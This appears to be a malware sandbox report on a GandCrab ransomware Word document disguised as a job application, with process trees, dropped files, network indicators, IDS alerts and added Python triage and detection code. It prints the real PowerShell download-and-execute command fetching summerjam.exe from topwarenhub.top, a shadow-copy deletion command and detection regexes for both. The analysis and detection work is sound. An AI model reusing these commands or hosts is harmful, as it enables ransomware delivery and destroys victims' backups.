Field | Value
---|---
File name | Bewerbung_Lena_Schwarz.doc
Full analysis | https://app.any.run/tasks/e72d8266-16ba-4cef-a7c5-98c779c4604a
Verdict | Malicious activity
Threats | GandCrab, one of the most widely known ransomware families. Ransomware is malware that encrypts the victim's files and demands payment to restore access; if the victim does not pay, the files stay encrypted and, absent backups or a public decryptor, cannot be recovered.
Analysis date | December 18, 2018, 08:03:24
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
Indicators | —
MIME | application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info | Microsoft Word 2007+
MD5 | E9CE01FB0F565A95B8BF66A0FA32D11B
SHA1 | 5B9B714AF457F7813BAAAD07B85C2BB8D2AE51F2
SHA256 | A75EF9B9FE8F637EEF6348F2F3AAB7F635FC0B64F383F49B06D84B54121A7A17
SSDEEP | 1536:SYzOtUwRhX/i2nR3BxHlqKOfLK8eps7B7gClU6ragbn7JJJUJJJPjGYAGDKJJJJo:F0UqX/icFBBYfWJsdLragb7JJJUJJJPL
TrID match | Description | Score
---|---|---
.docm | Word Microsoft Office Open XML Format document (with Macro) | 53.6
.docx | Word Microsoft Office Open XML Format document | 24.2
.zip | Open Packaging Conventions container | 18
.zip | ZIP compressed archive | 4.1

The .doc extension is misleading: the content is an OOXML (Word 2007+) package and TrID's best match is a macro-enabled .docm. A legacy .doc is an OLE2 compound file, not a ZIP container, so a .doc name on a ZIP-based package is itself a triage signal; let the content, not the extension, drive handling.
Property | Value
---|---
Description | -
Creator | User
Subject | -
Title | -
ModifyDate | 2018:12:18 05:50:00Z
CreateDate | 2018:12:18 05:42:00Z
RevisionNumber | 2
LastModifiedBy | User
Keywords | -
AppVersion | 16
HyperlinksChanged | No
SharedDoc | No
CharactersWithSpaces | 1
LinksUpToDate | No
Company | -
ScaleCrop | No
Paragraphs | 1
Lines | 1
DocSecurity | None
Application | Microsoft Office Word
Characters | 1
Words | -
Pages | 1
TotalEditTime | -
Template | summerjam

Two properties stand out. The document was created and last modified within eight minutes (05:42Z to 05:50Z) on the same day as the analysis and contains a single character of text, so the document body carries essentially no text content. The Template property, summerjam, is the same name as the payload the macro later fetches (summerjam.exe).

ZIP entry property | Value
---|---
ZipFileName | [Content_Types].xml
ZipUncompressedSize | 1511
ZipCompressedSize | 404
ZipCRC | 0x23cbfb46
ZipModifyDate | 1980:01:01 00:00:00
ZipCompression | Deflated
ZipBitFlag | 0x0006
ZipRequiredVersion | 20
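A static triage check for the points the file-type and property tables raise (a .doc name on an OOXML container, a macro-enabled content type, a non-default Template). This is an added example, not part of the ANY.RUN report; the package it inspects is constructed in memory to mirror the report's properties, and its word/vbaProject.bin is a placeholder, not a real VBA project.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
APP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
DOCX_MAIN_CT = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
DOCM_MAIN_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
VBA_CT = "application/vnd.ms-office.vbaProject"
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc (compound file) signature
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML packages are ZIP containers


def triage_ooxml(data: bytes) -> Dict[str, object]:
    """Inspect bytes regardless of file name: container type, main part content type,
    presence of a VBA project part, and the Template/Application properties."""
    info = {"container": "unknown", "main_content_type": None,
            "has_vba_project": False, "template": None, "application": None}
    if data.startswith(OLE2_MAGIC):
        info["container"] = "ole2"
        return info
    if not data.startswith(ZIP_MAGIC):
        return info
    info["container"] = "zip"
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        info["has_vba_project"] = any(n.lower() == "word/vbaproject.bin" for n in names)
        if "[Content_Types].xml" in names:
            types = ET.fromstring(zf.read("[Content_Types].xml"))
            for ov in types.iter(f"{{{CT_NS}}}Override"):
                if ov.get("PartName", "").lower() == "/word/document.xml":
                    info["main_content_type"] = ov.get("ContentType")
        if "docProps/app.xml" in names:
            app = ET.fromstring(zf.read("docProps/app.xml"))
            for key in ("Template", "Application"):
                el = app.find(f"{{{APP_NS}}}{key}")
                if el is not None:
                    info[key.lower()] = el.text
    return info


def triage_flags(filename: str, info: Dict[str, object]) -> List[str]:
    """Turn the extracted facts into triage flags; Normal.dotm is Word's default template."""
    flags = []
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    if ext == "doc" and info["container"] == "zip":
        flags.append("extension_mismatch: .doc name on an OOXML (zip) container")
    if info["main_content_type"] == DOCM_MAIN_CT:
        flags.append("macro_enabled_content_type")
    if info["has_vba_project"]:
        flags.append("vba_project_present")
    template = info["template"]
    if template and template.lower() not in ("normal.dotm", "normal.dot", "normal"):
        flags.append(f"nonstandard_template: {template}")
    return flags


def build_sample(template: str = "summerjam", macro: bool = True) -> bytes:
    """Constructed minimal OOXML package (not the real sample) with the report's properties."""
    defaults = ['<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>',
                '<Default Extension="xml" ContentType="application/xml"/>']
    if macro:
        defaults.append(f'<Default Extension="bin" ContentType="{VBA_CT}"/>')
    main_ct = DOCM_MAIN_CT if macro else DOCX_MAIN_CT
    content_types = (f'<?xml version="1.0" encoding="UTF-8"?><Types xmlns="{CT_NS}">'
                     + "".join(defaults)
                     + f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
                     + '<Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/>'
                     + "</Types>")
    app_xml = (f'<?xml version="1.0" encoding="UTF-8"?><Properties xmlns="{APP_NS}">'
               f"<Application>Microsoft Office Word</Application><Template>{template}</Template>"
               "<AppVersion>16.0000</AppVersion></Properties>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("docProps/app.xml", app_xml)
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        if macro:
            zf.writestr("word/vbaProject.bin", b"placeholder-not-a-real-vba-project")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample()
    details = triage_ooxml(sample)
    for flag in triage_flags("Bewerbung_Lena_Schwarz.doc", details):
        print(flag)
```

The check reads the package's own declarations rather than trusting the name: the Override content type for /word/document.xml says whether Word will treat the file as macro-enabled, and the VBA part is looked up by its fixed path. A real sample would additionally have its vbaProject.bin extracted and decompiled; that step is out of scope here.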
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3280 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bewerbung_Lena_Schwarz.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 | | | |
3348 | cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','%temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start %temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\Windows\system32\cmd.exe | — | WINWORD.EXE
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
3776 | powErshEll (New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
2448 | "C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe" | C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe | — | powershell.exe
User: admin; Integrity Level: MEDIUM | | | |
3968 | "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete | C:\Windows\system32\wbem\wmic.exe | — | ctftvkegqqyvcgmqcrbbttznbxrqj.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: WMI Commandline Utility; Exit code: 2147749908 (0x80041014); Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
3532 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Explorer; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
3264 | C:\Windows\system32\DllHost.exe /Processid:{4D111E08-CBF7-4F12-A926-2C7920AF52FC} | C:\Windows\system32\DllHost.exe | — | svchost.exe
User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: COM Surrogate; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
2376 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\AADIBVT-DECRYPT.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Notepad; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |

Reading the tree: WINWORD.EXE (3280) spawns cmd.exe (3348), which launches PowerShell (3776) to download http://topwarenhub.top/summerjam.exe into %TEMP% under a random name and start it. The mixed-case "powErshEll" is a common evasion of case-sensitive command-line matching, and the cmd.exe hop is what expanded %temp% to C:\Users\admin\AppData\Local\Temp, as the child's command line shows. The payload (2448) then runs wmic shadowcopy delete (3968) to destroy Volume Shadow Copies before encryption. That process exited with 2147749908, which is 0x80041014 (WBEM_E_INITIALIZATION_FAILURE), so the deletion did not succeed in this run; treat the attempt, not its outcome, as the indicator. The only HIGH-integrity process, DllHost.exe (3264), is spawned by svchost.exe and the report does not tie it to the payload. The ransom note AADIBVT-DECRYPT.txt opened in Notepad (2376) is the last visible stage.
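Detection logic for the chain in the process table, run over a process list constructed from that table. This is an added example, not part of the ANY.RUN report or of any product; parent PIDs are inferred from the "Parent process" column (explorer.exe's own PID is not in the report, so the Word process has no parent here), and the rule names are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Proc:
    pid: int
    image: str            # lower-cased executable name
    cmdline: str
    ppid: Optional[int]   # None when the parent is outside the captured tree


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Every pattern is case-insensitive: the sample's "powErshEll" is written to slip
# past exact-case string matches on the command line.
CRADLE_RE = re.compile(
    r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|\biwr\b|\biex\b", re.I)
SHADOW_RE = re.compile(
    r"wmic(\.exe)?\W+shadowcopy\s+delete|vssadmin(\.exe)?\W+delete\s+shadows", re.I)
TEMP_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe", re.I)
DOWNLOADFILE_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)


def build_index(procs: List[Proc]) -> Dict[int, Proc]:
    return {p.pid: p for p in procs}


def ancestry(index: Dict[int, Proc], pid: int) -> List[str]:
    """Image names from the given process up to the root of the captured tree."""
    chain, seen = [], set()
    cur = index.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur.image)
        cur = index.get(cur.ppid) if cur.ppid is not None else None
    return chain


def extract_download(cmdline: str) -> Optional[Tuple[str, str]]:
    """(URL, destination path) from a WebClient.DownloadFile cradle, if one is present."""
    m = DOWNLOADFILE_RE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


def detect(procs: List[Proc]) -> List[Tuple[int, str]]:
    """Return (pid, rule) findings for the four behaviours seen in the report."""
    index = build_index(procs)
    findings = []
    for p in procs:
        parent = index.get(p.ppid) if p.ppid is not None else None
        if parent and parent.image in OFFICE_APPS and p.image in SCRIPT_HOSTS:
            findings.append((p.pid, "office_spawns_script_host"))
        if p.image in {"cmd.exe", "powershell.exe"} and CRADLE_RE.search(p.cmdline):
            findings.append((p.pid, "download_cradle"))
        if SHADOW_RE.search(p.cmdline):
            findings.append((p.pid, "shadow_copy_deletion"))
        # A non-script binary started from %TEMP% by a script host: second-stage execution.
        if (parent and parent.image in SCRIPT_HOSTS and p.image not in SCRIPT_HOSTS
                and TEMP_EXE_RE.search(p.cmdline)):
            findings.append((p.pid, "temp_exe_from_script_host"))
    return findings


# Constructed from the report's process table (command lines verbatim, parents inferred).
SAMPLE_PROCS = [
    Proc(3280, "winword.exe", r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bewerbung_Lena_Schwarz.doc"', None),
    Proc(3348, "cmd.exe", r"cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','%temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start %temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exe", 3280),
    Proc(3776, "powershell.exe", r"powErshEll (New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe", 3348),
    Proc(2448, "ctftvkegqqyvcgmqcrbbttznbxrqj.exe", r'"C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe"', 3776),
    Proc(3968, "wmic.exe", r'"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete', 2448),
]

if __name__ == "__main__":
    index = build_index(SAMPLE_PROCS)
    for pid, rule in detect(SAMPLE_PROCS):
        print(f"{pid:5d} {rule:28s} {' <- '.join(ancestry(index, pid))}")
```

The cradle regex fires on both the cmd.exe and the PowerShell command lines, and extract_download shows why both are worth keeping: the cmd.exe record still holds the unexpanded %temp% path while the PowerShell child carries the resolved drop path, so the pair together yields the URL, the destination and the expansion step. The shadow-copy rule matches the quoted wmic.exe path form used here as well as the bare vssadmin form.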
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8B7D.tmp.cvr | — | — | —
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0617B4C.png | — | — | —
3776 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E3U0PEQ3PAC177DB7JPO.temp | — | — | —
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | — | — | —
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C4CDEA1A-446A-445F-BA69-DAB98D7F756F}.tmp | binary | 32A214AA6F5C0C005379DB477169E1CD | 9FBA5E06E6594CFCD596C498F0283AF4B06BBE25353CBD53EDCD561BAFBA6A4A
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4E237B48-06FC-47CF-9681-DDB7C049A5F3}.tmp | smt | 0AA5DB1388373EF0B3425E65C7C2A01F | C70EAED267AA52C30D6209DBCC91602CC754887C8C53034405CC1EBEF04FA402
3776 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\AADIBVT-DECRYPT.txt | text | F12313658A868B2113A23F91C95CBBC2 | F3806A6010FABFEEF4D6A4C6F6E2EB688FAA347F3B0A55CAE9EDD2D35E2594C4
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$werbung_Lena_Schwarz.doc | pgc | 14DD569DA6EB4450EFAD661DE8E4C881 | A90D5AF739E54AF3DDFB86EBF226B52BD15DD214170FED547A100D0CCD8221A5
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\Users\admin\AppData\AADIBVT-DECRYPT.txt | text | F12313658A868B2113A23F91C95CBBC2 | F3806A6010FABFEEF4D6A4C6F6E2EB688FAA347F3B0A55CAE9EDD2D35E2594C4

The ransom note AADIBVT-DECRYPT.txt is written with an identical hash into each directory the payload touches (here $Recycle.Bin and AppData, besides the copy on the Desktop that Notepad opened), so its hash is a reliable file indicator for this run; the dropped payload's own hash is not listed in this table.
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | — | 212.59.186.61:80 | http://www.hotelweisshorn.com/ | CH | — | — | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 83.138.82.107:80 | http://www.swisswellness.com/ | DE | — | — | whitelisted |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | — | 78.46.77.98:80 | http://www.2mmotorsport.biz/ | DE | — | — | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 302 | 192.185.159.253:80 | http://www.pizcam.com/ | US | — | — | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 83.166.138.7:80 | http://www.whitepod.com/ | CH | — | — | whitelisted |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 104.24.22.22:80 | http://www.belvedere-locarno.com/ | US | — | — | shared |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | POST | — | 217.26.53.161:80 | http://www.haargenau.biz/static/graphic/daessees.bmp | CH | — | — | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | — | 217.26.53.37:80 | http://www.hrk-ramoz.com/ | CH | — | — | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 80.244.187.247:80 | http://www.hotelfarinet.com/ | GB | — | — | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 200 | 136.243.13.215:80 | http://www.holzbock.biz/ | DE | html | 1.78 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 78.46.77.98:443 | www.2mmotorsport.biz | Hetzner Online GmbH | DE | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 192.185.159.253:80 | www.pizcam.com | CyrusOne LLC | US | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 74.220.215.73:80 | www.bizziniinfissi.com | Unified Layer | US | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 138.201.162.99:80 | www.fliptray.biz | Hetzner Online GmbH | DE | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 83.138.82.107:80 | www.swisswellness.com | hostNET Medien GmbH | DE | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 212.59.186.61:80 | www.hotelweisshorn.com | green.ch AG | CH | malicious |
3776 | powershell.exe | 94.96.135.211:80 | topwarenhub.top | Saudi Telecom Company JSC | SA | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 192.185.159.253:443 | www.pizcam.com | CyrusOne LLC | US | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 136.243.13.215:80 | www.holzbock.biz | Hetzner Online GmbH | DE | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 83.166.138.7:443 | www.whitepod.com | Infomaniak Network SA | CH | malicious |
Domain | IP | Reputation
---|---|---
topwarenhub.top | — | malicious
www.2mmotorsport.biz | — | unknown
www.haargenau.biz | — | unknown
www.bizziniinfissi.com | — | malicious
dns.msftncsi.com | — | shared
www.holzbock.biz | — | unknown
www.fliptray.biz | — | malicious
www.pizcam.com | — | unknown
www.swisswellness.com | — | whitelisted
www.hotelweisshorn.com | — | unknown
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
3776 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
3776 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3776 | powershell.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
3776 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3776 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3776 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | A Network Trojan was detected | ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | A Network Trojan was detected | MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | A Network Trojan was detected | MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity |